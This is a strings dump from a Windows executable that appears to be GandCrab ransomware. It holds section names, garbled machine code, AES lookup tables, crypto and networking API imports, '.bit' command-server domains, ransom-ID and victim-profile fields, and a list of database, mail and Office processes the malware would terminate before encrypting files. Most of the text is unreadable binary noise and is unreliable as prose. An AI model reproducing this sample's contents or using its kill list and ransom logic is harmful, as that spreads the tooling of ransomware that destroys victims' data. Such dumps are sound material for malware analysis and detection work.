L!This /rLm cannot be run in DOS mode.
4.Rich
`.rdata
@.rsrc
@.reloc
UQSVWj
3_^[]j
W_^[]U
^[]^3[]U
SVWj@h
fD$$QD$
U\SV3D$
fD$,D$
D$DP,@
D$TD$X
t$PD$\D$`
D$dD$8P
_^]SEPuW
[_3^]h
^]U$SV3Ek
]U\SV3Es
fE_^[u(Mu
<}tK<=tBF>
<}t)F<=t
UQSV3WE33p
[]_^[]VWy
GFu33;_
GFu33;_
HthHuo
<}tcG<=t
EPWuu(
MPEPPEP]
U_^[]UE
E F$E(F0E0F<E8FHE@FTEPFtEXF
PPRPRPRPj#
PD$ D$$i
VD$TD$Tp
_^[]jw8
D$8f|$8P
FFPh@h@
GfZvjj
D$P\$$
W|$,t$ D$03D$
r]K\$(
T$4T$$L$
L$(T$$;s
D$D\$@
s(SV`@
BNu^[=
3VL$dl(
\$$D$,m
D$DD$0w
fL$@D$Ds
f|$ D$h/
L$h)L$
FK$'rt$
V_^[]3<
EPMQUREPMN
u4MQUREPU
]U\VjDE
FGuh8@
SVUMWj
GFu_^[t
]ULSVW3En
t6SEPV
3_^[]h8@
_^3[]UDf
ESVW=D@
EemsiEsoftE.bitE
EgandEcrabE.bitE
33DFE3
_^[]V5D@
t'Whp@
SVUWPE
33EVVPWj
t(MAQSjVj
SVWj@h
EtPpNWu
UWM]d$
uP|PhP
|PSM<%
SVWj@h
u_^[]U
L$(|$,
D$$D$$PQh
6D$$D$$PWh
Wt$(j@Bh
t$(D$$D$
L$@<GW
PVjt$ j
D$<L$J
PPT$4$
D$$D$$PWh
t$(3HL$
SVW3Uh
u_^[]U
U3M39]
r_^[]U
E]UQMEM
E]SVWj@h
_^[SV5@
ft?+ft
fu[_3^
SVWj@h
_^[]UQSVWj@h
_^[]Uh
_^3[]U0SWj@h
D$@D$D
3_fLF^[]
SVW39t
^[_^[UQVEPh
SVW=D@
F t=Qh
EF8EPh
EFPEPh
umMEPQj
3fEEPv|t\
EPEPEPEPEP
v|uN|uh
N|3fTA
ULSV5D@
33WPMM
3PPPPfE$
_^[]U<SVWF
PfEEjPWEs
KPSVWE
E_^[],
Vft;+ft
fu^_3[^_[SVW
GFu_^3[
_^[UdSVWh
AafDMA
EECrypPEtGenERandfEomE
EAdvaEpi32E.dllE
_^3[]U8SVWh
3MWWEP]
EECrypPEtGenERandfEomE
EAdvaEpi32E.dllE
_^3[]U
MH$E3M
P0p4x8X<
MHDE3M
pTxXX\
MHdE3M
ptxxX|
on0v00f
on0v00f
on0v00f
DDDDDDDDDDDDDD
EMEineIE5ntel5*A
E5Genu
MMtCE%?
KuZ^%l@
vwv$v2
vFvFv.Av
xv}vBv2vA
v)vyv{xv%
wY5v #vUv
u,IuBJuu
cc||ww{{
kkooT`00P
ggV++}
bMvvE@}}
Ag_E#Srr[u
=L&&jl66Z~??A
Oh44\Q4
qqsb11S*
RF##e^0
=&N''i
-nnZZ[RRv;;Ma}R)){>^//q
,@ `y
[[jjFgr99KJJ
XXJk*O
MMf33U
PPx<<D%KQQ]@@
?!p88H
cwuB!!c
5/__5DD.
9WU~~z==Gdd]]2
D""fT**~;
v;d22Vt::N
H$$l\\]nCbb917yy2Cn77Ymm
dNNIllVV
%eezzG
oxxJ%%o\..r8
Q#|tt>!KKa
pp|>>BqffHH
aaj55_WWi
IUUP((xz
e1BBhhAA)Z--w
:cc||ww{{
kkooTP`00
gg}V++
Ag_E#Srr[u
=jL&&Zl66A~??
O\h44Q4
qqsSb11?*
ReF##^(0
=&iN''
tX,,.4
nnZZ[RRMv;;a}{R))>q^//
,`@ y[[jjFgKr99
LLXXJk*O
MMUf33
PPDx<<%KQQ]@@
?!Hp88
cwucB!!0
WU~~Gz==dd]]+2
fD""~T**;
FF)k<(
v;Vd22Nt::
lH$$\\]nCbb917yy2CYn77mm
NNIllVV
%eezzG
oxxoJ%%r\..$8
tt!>
ppB|>>qff
aa_j55WWi
IUUxP((z
AA)wZ--
{TTm:,
cc||ww{{
kkooT0P`0
gg+}V+
_E#Srr[u
=&jL&6Zl6?A~?
O4\h4Q4
qqs1Sb1
R#eF#^
=&'iN'
nnZZ[RR;Mv;a
}){R)>/q^/
, `@ y[[jjF
g9Kr9J
LXXJk*O
PP<Dx<%KQQ]@@
?!8Hp8
cwu!cB!
U~~=Gz=dd]]
"fD"*~T*;
v;2Vd2:Nt:
$lH$\\]n
Cbb917yy2C7Yn7mm
NIllVV
%eezzG
oxx%oJ%.r\.
WsQ#|tt!>K
pp>B|>qffH
aa5_j5WWi
IUU(xP(z
A)-wZ-
cc||ww{{
kkooT00P`
gg++}V
bMvvE@}}
Ag_E#Srr[u
=&&jL66Zl??A~
O44\hQ4
qqs11Sb
R##eF^
=&''iN
-6nnZZ
[RR;;Mva})){R>//q^
, `@
y[[jjFg99KrJJ
PP<<Dx%KQQ
?!88Hp
cwu!!cB
9.WU~~==Gzdd]]
+2ss``
""fD**~T;
v;22Vd::Nt
$$lH\\]nCbb
917yy2C77Ynmm
%eezzG
oxx%%oJ..r\
$8WsQ#|tt!>KK
pp>>B|qffHH
aa55_jWWi
IUU((xPz
QP~AeS
:'^;kEXK
0Uvmv
L%O*&5Db
-Xt!Ii)Du
jyxX>k'q
f}:cJ
1Q3`bS
+pHhXE
lR{s#rK
WfU*(
dh\![T$6.:
Oa ZwKi
&\rDf;[~4C)v#
V},"3IN8
&?,:Px
}cn;{&x
)|1*?#1
05ftN7
zG<YUs?
ys7S_[=o
h>8$4,
a2pHl\t
WBPQS~Ae
:'^;kEXK
U 0vmv%
Xt!)IiDju
xykX>'qO
1`Q3EbS
ElR{#srK
='6-9d
[T:$6.
a iZwK
&\rDf;4[~vC)#hc1
?V},"3
Pxj_bT~F
)|11*?#0
<zGY?Usy
>h,8$4_
p2tHl\B
WPQeS~A
^:'k;EX
KU 0mvvL%
O*D&5bZI
!Xti)ID
juyx>kXq'O
EbSwdk
ElR{#s
rKW*fU(
=9'6-d
[.:$6g
O aKiZw
\r;Df~4[)vC#hc1
,V}"3N
j_FbT~
|)1#1*?0
vMMCMT
<zGYs?Uy
7sS[_o
>h4,8$@_
p2\tHlWB
PQAeS~
'^:k;EX
K0U vmv
L%O*5D&bZI
-t!Xi)ID
juyxX>kq'O
+HhXpE
l{Rs#K
rWU*f(
O awKiZ
&r\f;D~4[C)v#hc1c
J$}=2
},V3"IN
cn;{&x
|)1?#1*0
G<zYs?U
7sS[_=o
xh>$4,8@_
a{2pl\tHWBR
8$4,6-9'$6.:*?#1pHhX~AeSlZrNbS
EHl\tFeQ
T~FbZwKi
;{2p)m fW
Js#z(a5h>W
;k5f'q)|
s7}:o-a vm
`dwmzRY
&MFCMQP_[u
dVNi@`R{\r
>!0("3,:
necntsyx
MTAO]Sywek1?-#
ZX>kQ3`J$}C)v4b=o
A.al{vUXOB
'*zG<tN7fU*h\!Bc
y2+H<"C.9^ 0U
0YRODu~ch
p4.S:'^(<I&5D|B
Df;Jo6Xt!V},7
/KGd"Ii)[~4Us?
ypkb]TOF
,8$4'6-9:$6.1*?#XpHhS~AeNlZrEbS
FeQbT~FiZwK
{;p2m)f W\
#s(z5a>h
L;k5f'q)|
s7}:o-a vm
&FMMCPQ[_ju
dVNi@`R{\r
>!0("3,:=
%enncstxyI
MAO]Sywek1?-#
kX>`Q3}J$vC)4b
Aal{vUXOB
'*<zG7tN*fU!h\
H2+C<"^.9U 0
YRODu~ch
p4.S:'^(<I&5D|B
Df;Jo6Xt!V},z7
/"Gd)Ii4[~?Us
mG18#*
ypkb]TOF
4,8$9'6-.:$6#1*?hXpHeS~ArNlZ
EbS\tHlQ
FeFbT~KiZw
{;p2m)f W\
#s(z5a>h
Lk;f5q'|)_
Y7s:}-o amv`
FMMCPQ[_ju
j_dVNi@`R{\r
>!0("3,:
necntsyxZI
AO]Sywek
Zg>kX3`Q$}J)vCb4o
al{vUXOB
*<zG7tN*fU!h\
H2+C<"^.9U 0
YRODu~chg
S4.^:'I(<D&5
nY;Df6Jo!Xt,V}
d"Gi)I~4[s?UP
ypkb]TOF
$4,8-9'66.:$?#1*HhXpAeS~ZrNlS
Ebl\tHeQ
F~FbTwKiZ
;{2p)m fW
Js#z(a5h>W
k;f5q'|)_
Y7s:}-o avm
`dwmzRY
&FMMCPQ[_
jVdiN`@{Rr\
!>(03":,
necntsyxZI
MTAO]Sywek1?-#
ZX>kQ3`J$}C)v4b=o
A.al{vUXOB
*G<zN7tU*f\!hc
+H2"C<9^.0U
0YRODu~ch
.S4'^:<I(5D&B
nf;Do6Jt!X},V
d"Gi)I~4[s?UP
ypkb]TOFA
pub_key
DELETE}
{DELETE}
advapi32.dll
CheckTokenMembership
Address:
fabian wosar <3
Can't find server
aeriedjD#shasj
*******************
RtlComputeCrc32
GandCrabGandCrabnomoreransom.bit|
ExitProcess
lstrlenA
HeapAlloc
HeapFree
GetProcessHeap
GetProcAddress
VirtualAlloc
GetModuleHandleA
lstrcpyA
GetEnvironmentVariableW
GetFileSize
MapViewOfFile
UnmapViewOfFile
GetModuleHandleW
WriteFile
GetModuleFileNameW
CreateFileW
ExitThread
lstrlenW
GetTempPathW
CreateFileMappingW
lstrcatW
CloseHandle
CreateThread
VirtualFree
lstrcmpiW
lstrcmpiA
SetFilePointer
GetFileAttributesW
ReadFile
GetLastError
MoveFileW
lstrcpyW
SetFileAttributesW
CreateMutexW
GetDriveTypeW
VerSetConditionMask
WaitForSingleObject
GetTickCount
InitializeCriticalSection
OpenProcess
GetSystemDirectoryW
TerminateThread
TerminateProcess
VerifyVersionInfoW
WaitForMultipleObjects
DeleteCriticalSection
ExpandEnvironmentStringsW
CreateProcessW
SetHandleInformation
lstrcatA
MultiByteToWideChar
CreatePipe
Process32FirstW
Process32NextW
CreateToolhelp32Snapshot
LeaveCriticalSection
EnterCriticalSection
FindFirstFileW
lstrcmpW
FindClose
FindNextFileW
GetNativeSystemInfo
GetComputerNameW
GetDiskFreeSpaceW
GetWindowsDirectoryW
GetVolumeInformationW
LoadLibraryA
KERNEL32.dll
DispatchMessageW
DefWindowProcW
UpdateWindow
SendMessageW
CreateWindowExW
ShowWindow
SetWindowLongW
LoadIconW
RegisterClassExW
TranslateMessage
wsprintfW
BeginPaint
LoadCursorW
GetMessageW
DestroyWindow
EndPaint
GetForegroundWindow
USER32.dll
TextOutW
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegSetValueExW
AllocateAndInitializeSid
FreeSid
CryptExportKey
CryptAcquireContextW
CryptGetKeyParam
CryptReleaseContext
CryptImportKey
CryptEncrypt
CryptGenKey
CryptDestroyKey
GetUserNameW
RegQueryValueExW
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHGetSpecialFolderPathW
SHELL32.dll
CryptStringToBinaryA
CryptBinaryToStringA
CRYPT32.dll
InternetOpenW
InternetReadFile
InternetConnectW
HttpSendRequestW
HttpAddRequestHeadersW
HttpOpenRequestW
InternetCloseHandle
WININET.dll
GetDeviceDriverBaseNameW
EnumDeviceDrivers
PSAPI.DLL
IsProcessorFeaturePresent
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
0000000000
1#1-171A1i1s1}111111111111
2:2D2N2X2b2l2v2222222222
33)333=3G3^3h3r3|3333333333
4/494C4M4W4g4q4{444444444
5(585B5L5V5~555555555555
6'6O6Y6c6m6w666666666666 7*747>7H7R7\7s7}7777777777
8#8-8D8N8X8b8l8|88888888888
99)939=9M9W9a9k99999999999
:(:2:<:d:n:x::::::::::::
;5;?;I;S;];g;q;;;;;;;;;;<<<<<<<<<
='=1=;=E=m=w============
>?>I>S>]>g>q>{>>>>>>>>>>
?%?/?9?C?M?e?o?y??????????
0070A0K0U0_0o0y0000000000
1'111A1K1U1_111111111111
2'212Y2c2m2w222222222222
3+353?3I3S3]3g3
3333333333
4%4/494Q4[4e4o4y4444444444
5#5-575A5K5[5e5o5y5555555555
6-676A6K6s6}666666666666
7E7O7Y7c7m7w77777777777N8k8{88888
9D9M99:::::.;:;
;;;;;;;
<0<7<I<Z<b<<<<<<<<<
>0>U>[>j>w>>>>>>>>>>>>
?A?\?????
01111S2]2d2u2
22222:3A333444445
6(6Z6e6m666&7S77748\8888888-989p9x999
:#:1:8:H:N:::::::9;;O<
=-=B=H=====
>'>L>j>>>>?
0"0)030:0D0Q0k000
151A1I1Q1V11111111111122222
5%595555555
6W6_6g6o6w6
66666666666666666
77*757@7K7V7a7l7w7777777777
8&8-878L8e8888888
9p9999
:.:4:T:Z:|::::::::/;=;q;{;;;;
<i<<<<<
>&>+>1>;>U>g>>>>>>N?\?y????????
0(0-050=0g0m000000
1T11111111
2!222Q2`222222
3+3=3L3S3a333333
44,494D4l4s44444*5a555555
6?666666
77P888w9|9999999999
::R:\:n:~:::
<======
>%>/>;>D>P>
0$000:0J0V0000000
1%1*1@1T1h1|111
232D2p2x222222222
3A33334F4444444
5&5-5U5s5~55555555
6/6W6^6e666666666%7+707G7q7~7777
8808[8i8p8~8888
9%989=9M9\9e9{9999999
:,:::N:\:p:~::::::::
;";);7;E;X;i;w;;;;;;;;
< <6<A<W<b<x<<<<<<<<(=I=Y=h=q=====!>&>B>J>>>>>>>>B?b?m???????
0 0P0b0}00000000
1#1*11111
20292H2Z2_2s2~22222222
33&3-343S3[3
333 4*434<4R4^4f4r4}4444
5*5R5Y5`5g5n5u5|5555555555
6'6L6Q6Y6a6h6v666666&77
:4:a:k:u::::
;4;b;n;t;;
=g=u=====O>]>l>>>>>6?C?R?\?b??????
00g0n0~0000000$1+1;1H1s1z111111
2H2O2^2h2n22222
3$333=3C3333333
5+5956
7#7+7074787a77777777777
8 8$888888888
9A9H9L9P9T9X9\9`9d999999D;g;;;;;$<<<<<<<<
j j j j j j
@ @ @ @ @ @
A p p D a t a
\ M i c r o s o f t \
G a n d C r a b !
w i n 3 2 a p p
f i r e f o x
r a n s o m _ i d
o s _ b i t
o s _ m a j o r
p c _ k e y b
p c _ l a n g
p c _ g r o u p
p c _ n a m e
p c _ u s e r
r a n s o m _ i d =
{ U S E R I D }
G l o b a l \
m s f t e s q l . e x e
s q l a g e n t . e x e
s q l b r o w s e r . e x e
s q l s e r v r . e x e
s q l w r i t e r . e x e
o r a c l e . e x e
o c s s d . e x e
d b s n m p . e x e
s y n c t i m e . e x e
m y d e s k t o p q o s . e x e
a g n t s v c . e x e i s q l p l u s s v c . e x e
x f s s v c c o n . e x e
m y d e s k t o p s e r v i c e . e x e
o c a u t o u p d s . e x e
a g n t s v c . e x e a g n t s v c . e x e
a g n t s v c . e x e e n c s v c . e x e
f i r e f o x c o n f i g . e x e
t b i r d c o n f i g . e x e
o c o m m . e x e
m y s q l d . e x e
m y s q l d - n t . e x e
m y s q l d - o p t . e x e
d b e n g 5 0 . e x e
s q b c o r e s e r v i c e . e x e
e x c e l . e x e
i n f o p a t h . e x e
m s a c c e s s . e x e
m s p u b . e x e
o n e n o t e . e x e
o u t l o o k . e x e
p o w e r p n t . e x e
s t e a m . e x e
t h e b a t . e x e
t h e b a t 6 4 . e x e
t h u n d e r b i r d . e x e
v i s i o . e x e
w i n w o r d . e x e
w o r d p a d . e x e
/ c t i m e o u t - c 5 &